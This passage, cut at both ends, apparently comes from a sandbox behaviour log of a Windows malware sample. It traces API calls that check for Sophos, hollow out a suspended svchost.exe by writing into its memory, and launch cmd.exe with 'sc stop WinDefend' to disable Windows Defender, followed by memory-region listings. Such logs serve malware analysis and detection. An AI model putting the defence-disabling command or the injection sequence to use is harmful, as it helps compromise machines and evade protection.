lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x601fe8 [0128.430] OpenServiceW (hSCManager=0x601fe8, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0 [0128.430] CloseServiceHandle (hSCObject=0x601fe8) returned 1 [0128.430] GetNativeSystemInfo (in: lpSystemInfo=0x18b204 | out: lpSystemInfo=0x18b204*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0128.430] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ad90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0128.431] GetCurrentProcess () returned 0xffffffff [0128.431] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18a904 | out: TokenHandle=0x18a904*=0xf0) returned 1 [0128.431] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x1, TokenInformation=0x18a908, TokenInformationLength=0x4c, ReturnLength=0x18a8f0 | out: TokenInformation=0x18a908, ReturnLength=0x18a8f0) returned 1 [0128.431] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18a8fc, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18a8f8 | out: pSid=0x18a8f8*=0x6121b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0128.431] EqualSid (pSid1=0x18a910*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)), pSid2=0x6121b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0128.431] CloseHandle (hObject=0xf0) returned 1 [0128.431] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x18a978 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0128.433] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0128.433] VirtualAlloc (lpAddress=0x0, dwSize=0x1d400, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000 [0128.435] VirtualAlloc (lpAddress=0x0, dwSize=0x352e, flAllocationType=0x3000, flProtect=0x40) returned 0x3f0000 [0128.436] VirtualAlloc (lpAddress=0x10000000, dwSize=0x7000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000 [0128.436] VirtualAlloc (lpAddress=0x10000000, dwSize=0x268, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0128.436] VirtualProtect (in: lpAddress=0x10000000, dwSize=0x268, flNewProtect=0x2, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x4) returned 1 [0128.436] VirtualAlloc (lpAddress=0x10001000, dwSize=0x2b8a, flAllocationType=0x1000, flProtect=0x40) returned 0x10001000 [0128.437] VirtualAlloc (lpAddress=0x10004000, dwSize=0x444, flAllocationType=0x1000, flProtect=0x40) returned 0x10004000 [0128.437] VirtualAlloc (lpAddress=0x10005000, dwSize=0x78, flAllocationType=0x1000, flProtect=0x40) returned 0x10005000 [0128.437] VirtualAlloc (lpAddress=0x10006000, dwSize=0x1f8, flAllocationType=0x1000, flProtect=0x40) returned 0x10006000 [0128.437] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x2b8a, flNewProtect=0x20, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0128.437] VirtualProtect (in: lpAddress=0x10004000, dwSize=0x444, flNewProtect=0x2, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0128.437] VirtualProtect (in: lpAddress=0x10005000, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0128.438] VirtualProtect (in: lpAddress=0x10006000, dwSize=0x1f8, flNewProtect=0x2, lpflOldProtect=0x18a940 | out: lpflOldProtect=0x18a940*=0x40) returned 1 [0128.438] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x40) returned 0x5e0000 [0128.438] Wow64DisableWow64FsRedirection (in: OldValue=0x18a508 | out: OldValue=0x18a508*=0x0) returned 1 [0128.438] GetSystemDirectoryW (in: lpBuffer=0x18a510, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.438] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x428b8a*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18a720 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0x18a720*(hProcess=0xf8, hThread=0xfc, dwProcessId=0x714, dwThreadId=0xa08)) returned 1 [0128.472] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x880000 [0128.473] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32.dll", BaseAddress=0x18a8b8 | out: BaseAddress=0x18a8b8*=0x0) returned 0xc0000018 [0128.473] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernelbase.dll", BaseAddress=0x18a8c0 | out: BaseAddress=0x18a8c0*=0x1fb0000) returned 0x0 [0128.477] NtCreateEvent (in: EventHandle=0x18a8f8, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x18a8f8*=0x104) returned 0x0 [0128.477] NtCreateEvent (in: EventHandle=0x18a900, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x18a900*=0x100) returned 0x0 [0128.477] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x104, TargetProcessHandle=0xf8, TargetHandle=0x18a818, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18a818*=0x4) returned 0x0 [0128.477] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x100, TargetProcessHandle=0xf8, TargetHandle=0x18a820, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18a820*=0x8) returned 0x0 [0128.477] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a7b8*=0x0, ZeroBits=0x0, RegionSize=0x18a768*=0x220, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a7b8*=0x50000, RegionSize=0x18a768*=0x1000) returned 0x0 [0128.477] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x50000, Buffer=0x10003850*, NumberOfBytesToWrite=0x220, NumberOfBytesWritten=0x18a7c0 | out: Buffer=0x10003850*, NumberOfBytesWritten=0x18a7c0*=0x220) returned 0x0 [0128.477] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a7b8*=0x0, ZeroBits=0x0, RegionSize=0x18a768*=0x48, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a7b8*=0x60000, RegionSize=0x18a768*=0x1000) returned 0x0 [0128.477] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x60000, Buffer=0x18a818*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x18a7c0 | out: Buffer=0x18a818*, NumberOfBytesWritten=0x18a7c0*=0x48) returned 0x0 [0128.477] NtQueryInformationProcess (in: ProcessHandle=0xf8, ProcessInformationClass=0x0, ProcessInformation=0x18a338, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x18a338, ReturnLength=0x0) returned 0x0 [0128.477] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x7fffffde000, Buffer=0x18a4b8, NumberOfBytesToRead=0x2c8, NumberOfBytesRead=0x18a7b0 | out: Buffer=0x18a4b8*, NumberOfBytesRead=0x18a7b0*=0x2c8) returned 0x0 [0128.478] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0xffaa0000, Buffer=0x18a368, NumberOfBytesToRead=0x40, NumberOfBytesRead=0x18a7b8 | out: Buffer=0x18a368*, NumberOfBytesRead=0x18a7b8*=0x40) returned 0x0 [0128.478] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0xffaa00e8, Buffer=0x18a3a8, NumberOfBytesToRead=0x108, NumberOfBytesRead=0x18a7c0 | out: Buffer=0x18a3a8*, NumberOfBytesRead=0x18a7c0*=0x108) returned 0x0 [0128.478] NtProtectVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a788*=0xffaa246c, NumberOfBytesToProtect=0x18a7b8, NewAccessProtection=0x40, OldAccessProtection=0x18a7b0 | out: BaseAddress=0x18a788*=0xffaa2000, NumberOfBytesToProtect=0x18a7b8, OldAccessProtection=0x18a7b0*=0x20) returned 0x0 [0128.478] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0xffaa246c, Buffer=0x18a7e8*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x18a8c0 | out: Buffer=0x18a7e8*, NumberOfBytesWritten=0x18a8c0*=0x16) returned 0x0 [0128.478] NtClearEvent (EventHandle=0x100) returned 0x0 [0128.478] NtClearEvent (EventHandle=0x104) returned 0x0 [0128.478] NtResumeThread (in: ThreadHandle=0xfc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0128.478] NtSignalAndWaitForSingleObject (SignalObject=0x100, WaitObject=0x104, Alertable=0, Time=0x0) returned 0x0 [0128.527] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a6f0*=0x10000000, ZeroBits=0x0, RegionSize=0x18a708*=0x20000, AllocationType=0x2000, Protect=0x40 | out: BaseAddress=0x18a6f0*=0x10000000, RegionSize=0x18a708*=0x20000) returned 0x0 [0128.528] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a700*=0x10000000, ZeroBits=0x0, RegionSize=0x18a788*=0x400, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a700*=0x10000000, RegionSize=0x18a788*=0x1000) returned 0x0 [0128.528] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x10000000, Buffer=0x5c0000*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x18a680 | out: Buffer=0x5c0000*, NumberOfBytesWritten=0x18a680*=0x400) returned 0x0 [0128.529] NtProtectVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a720*=0x10000000, NumberOfBytesToProtect=0x18a760, NewAccessProtection=0x2, OldAccessProtection=0x18a8c8 | out: BaseAddress=0x18a720*=0x10000000, NumberOfBytesToProtect=0x18a760, OldAccessProtection=0x18a8c8*=0x4) returned 0x0 [0128.529] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a6c0*=0x10001000, ZeroBits=0x0, RegionSize=0x18a798*=0x19800, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x10001000, RegionSize=0x18a798*=0x1a000) returned 0x0 [0128.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x19800, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x890000, RegionSize=0x18a730*=0x1a000) returned 0x0 [0128.530] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x10001000, Buffer=0x890000*, NumberOfBytesToWrite=0x19800, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x890000*, NumberOfBytesWritten=0x18a5f8*=0x19800) returned 0x0 [0128.531] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x890000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0128.532] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x10001000, Buffer=0x5c0400*, NumberOfBytesToWrite=0x19800, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x5c0400*, NumberOfBytesWritten=0x18a5f8*=0x19800) returned 0x0 [0128.533] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a6c0*=0x1001b000, ZeroBits=0x0, RegionSize=0x18a798*=0x2400, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x1001b000, RegionSize=0x18a798*=0x3000) returned 0x0 [0128.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x2400, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x890000, RegionSize=0x18a730*=0x3000) returned 0x0 [0128.533] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x1001b000, Buffer=0x890000*, NumberOfBytesToWrite=0x2400, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x890000*, NumberOfBytesWritten=0x18a5f8*=0x2400) returned 0x0 [0128.534] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x890000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0128.534] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x1001b000, Buffer=0x5d9c00*, NumberOfBytesToWrite=0x2400, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x5d9c00*, NumberOfBytesWritten=0x18a5f8*=0x2400) returned 0x0 [0128.534] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a6c0*=0x1001e000, ZeroBits=0x0, RegionSize=0x18a798*=0x200, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x1001e000, RegionSize=0x18a798*=0x1000) returned 0x0 [0128.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x200, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x890000, RegionSize=0x18a730*=0x1000) returned 0x0 [0128.535] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x1001e000, Buffer=0x890000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x890000*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0128.535] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x890000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0128.535] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x1001e000, Buffer=0x5dc000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x5dc000*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0128.535] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a6c0*=0x1001f000, ZeroBits=0x0, RegionSize=0x18a798*=0x200, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x18a6c0*=0x1001f000, RegionSize=0x18a798*=0x1000) returned 0x0 [0128.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a690*=0x0, ZeroBits=0x0, RegionSize=0x18a730*=0x200, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a690*=0x890000, RegionSize=0x18a730*=0x1000) returned 0x0 [0128.535] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x1001f000, Buffer=0x890000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x890000*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0128.536] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a740*=0x890000, RegionSize=0x18a770, FreeType=0x8000) returned 0x0 [0128.536] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x1001f000, Buffer=0x5dc200*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x5dc200*, NumberOfBytesWritten=0x18a5f8*=0x200) returned 0x0 [0128.536] NtProtectVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a710*=0x10001000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x20, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x10001000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0128.536] NtProtectVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a710*=0x1001b000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x4, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x1001b000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0128.536] NtProtectVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a710*=0x1001e000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x2, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x1001e000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0128.536] NtProtectVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a710*=0x1001f000, NumberOfBytesToProtect=0x18a780, NewAccessProtection=0x2, OldAccessProtection=0x18a8d0 | out: BaseAddress=0x18a710*=0x1001f000, NumberOfBytesToProtect=0x18a780, OldAccessProtection=0x18a8d0*=0x4) returned 0x0 [0128.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a6f8*=0x0, ZeroBits=0x0, RegionSize=0x18a748*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a6f8*=0x890000, RegionSize=0x18a748*=0x1000) returned 0x0 [0128.537] NtQueryInformationProcess (in: ProcessHandle=0xf8, ProcessInformationClass=0x0, ProcessInformation=0x890000, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x890000, ReturnLength=0x0) returned 0x0 [0128.537] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x7fffffde010, Buffer=0x18a648*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x18a678 | out: Buffer=0x18a648*, NumberOfBytesWritten=0x18a678*=0x8) returned 0x0 [0128.537] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x7fffffde018, Buffer=0x18a758, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x18a688 | out: Buffer=0x18a758*, NumberOfBytesRead=0x18a688*=0x8) returned 0x0 [0128.537] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x77712640, Buffer=0x18a7a0, NumberOfBytesToRead=0x30, NumberOfBytesRead=0x18a698 | out: Buffer=0x18a7a0*, NumberOfBytesRead=0x18a698*=0x30) returned 0x0 [0128.537] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x4126d0, Buffer=0x18a7d8, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x18a6a8 | out: Buffer=0x18a7d8*, NumberOfBytesRead=0x18a6a8*=0x88) returned 0x0 [0128.537] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x412700, Buffer=0x18a648*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x18a6b8 | out: Buffer=0x18a648*, NumberOfBytesWritten=0x18a6b8*=0x8) returned 0x0 [0128.537] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a620*=0x0, ZeroBits=0x0, RegionSize=0x18a628*=0x7e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a620*=0x20000, RegionSize=0x18a628*=0x1000) returned 0x0 [0128.537] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x20000, Buffer=0x18a6d0*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x18a6c8 | out: Buffer=0x18a6d0*, NumberOfBytesWritten=0x18a6c8*=0x10) returned 0x0 [0128.538] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x20010, Buffer=0x37254c*, NumberOfBytesToWrite=0x6e, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x37254c*, NumberOfBytesWritten=0x18a5f8*=0x6e) returned 0x0 [0128.538] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x412718, Buffer=0x18a6d0*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x18a6e0 | out: Buffer=0x18a6d0*, NumberOfBytesWritten=0x18a6e0*=0x10) returned 0x0 [0128.538] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x60000, Buffer=0x18a5a8, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x18a618 | out: Buffer=0x18a5a8*, NumberOfBytesRead=0x18a618*=0x48) returned 0x0 [0128.538] NtAllocateVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x18a578*=0x0, ZeroBits=0x0, RegionSize=0x18a528*=0x10, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a578*=0xe0000, RegionSize=0x18a528*=0x1000) returned 0x0 [0128.538] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0xe0000, Buffer=0x18a598*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x18a580 | out: Buffer=0x18a598*, NumberOfBytesWritten=0x18a580*=0x10) returned 0x0 [0128.538] NtWriteVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x60000, Buffer=0x18a5a8*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x18a628 | out: Buffer=0x18a5a8*, NumberOfBytesWritten=0x18a628*=0x48) returned 0x0 [0128.538] NtClearEvent (EventHandle=0x104) returned 0x0 [0128.538] NtSignalAndWaitForSingleObject (SignalObject=0x100, WaitObject=0x104, Alertable=0, Time=0x0) returned 0x0 [0128.543] NtReadVirtualMemory (in: ProcessHandle=0xf8, BaseAddress=0x60000, Buffer=0x18a5a8, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x18a630 | out: Buffer=0x18a5a8*, NumberOfBytesRead=0x18a630*=0x48) returned 0x0 [0128.544] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a778*=0x890000, RegionSize=0x18a768, FreeType=0x8000) returned 0x0 [0128.544] NtClose (Handle=0x100) returned 0x0 [0128.544] NtClose (Handle=0x104) returned 0x0 [0128.544] CloseHandle (hObject=0xf8) returned 1 [0128.544] CloseHandle (hObject=0xfc) returned 1 [0128.544] ExitProcess (uExitCode=0x0) Thread: id = 150 os_tid = 0x864 Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41d4a000" os_pid = "0x874" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x844" cmd_line = "/c sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2485 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2486 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2487 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2488 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2489 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2490 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2491 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2492 start_va = 0x4a550000 end_va = 0x4a59bfff entry_point = 0x4a550000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2493 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2494 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2495 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2496 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2497 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2498 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2499 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2500 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2501 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2502 start_va = 0x3b0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2503 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2504 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2505 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2712 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2713 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2714 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2715 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2716 start_va = 0x75280000 end_va = 0x75286fff entry_point = 0x75280000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 2717 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = 